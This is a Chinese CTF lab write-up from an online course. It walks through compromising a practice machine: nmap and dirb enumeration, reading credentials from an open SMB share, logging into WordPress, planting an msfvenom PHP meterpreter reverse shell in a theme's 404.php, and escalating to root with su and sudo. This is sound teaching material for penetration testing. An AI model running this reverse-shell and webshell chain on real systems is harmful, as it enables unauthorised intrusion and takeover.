51CTO的网课,本篇针对SMB协议弱点分析,登录共享目录查找敏感文件;针对HTTP协议弱点分析,寻找突破点,登录后台上传webshell,提权获取flag。
本篇使用工具nmap、dirb、metasploit、webshell。
使用命令
nmap
探测靶场开放的服务与服务的版本
探测靶场全部信息
1
| -- nmap -A -v -T4 靶场IP地址
|
dirb
smbclient
1 2 3
| smbclient -L 靶机IP smbclient '\\靶机IP\share' get 敏感文件
|
mysql
1
| mysql -h 靶机IP -u Admin -p 口令
|
1 2 3 4 5 6
| msfconsole >use exploit/multi/handler >set payload php/meterpreter/reverse_tcp >set lhost 攻击机IP >set lport 攻击机端口 >run
|
webshell
1 2
| msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP lport=监听端口 -f raw > /root/Desktop/shell.php
|
1 2 3
|
http://靶机IP/wordpress/wp-content/themes/twentyfifteen/404.php
|
shell优化
1
| python -c "import pty;pty.spawn('/bin/bash')"
|
渗透记录
- nmap扫描靶机IP地址开放端口、系统信息等:
1 2
| nmap -sV 192.168.1.113 nmap -A -v -T4 192.168.1.113
|


- 访问smb服务,搜集敏感信息,share共享文件夹里可能有敏感信息:
1 2 3
| smbclient -L 192.168.1.113 smbclient '\\192.168.1.113\share' get 敏感文件
|

- 都查看一下,找到两个敏感文件
\share\deets.txt和\share\wordpress\wp-config.php:


- 利用搜集到的秘钥尝试连接mysql和ssh,均被拒绝:

- smb协议也可以用metasploit搜索可利用漏洞,这里无可利用漏洞:
1 2
| searchsploit Samba smbd 3.X - 4.X searchsploit Samba smbd 4.3.11-Ubuntu
|

- dirb搜索目录,查找可利用文件,找到了登录后台:
1
| dirb http://192.168.1.113
|

- 尝试使用前面的mysql密码成功登录:

- 生成反弹webshell脚本:
1
| msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.114 lport=4444 -f raw > /root/Desktop/shell.php
|

- metaspolit开启监听:
1 2 3 4 5 6
| msfconsole >use exploit/multi/handler >set payload php/meterpreter/reverse_tcp >set lhost 192.168.1.114 >set lport 4444 >run
|

- 网页后台上传webshell:
1 2 3
|
http://靶机IP/wordpress/wp-content/themes/twentyfifteen/404.php
|

- 访问404网页,可以看到反弹shell成功:

- 进入shell,优化输入,尝试切换root用户,失败:
1
| python -c "import pty;pty.spawn('/bin/bash')"
|

- 查看用户组,发现togie在
/home目录下,是一个用户:

- 切换到用户togie,密码是前面第3步搜集到的
12345,查看权限,提权:
1 2 3
| su togie sudo -l sudo su
|

- 提权成功,切换到根目录,拿到flag:

参考资料
- 2020发布 CTF基础入门/CTF教程零基础 渗透测试/web安全/CTF夺旗【整套教程】
- 3-1CTF夺旗入门教程–SMB信息泄露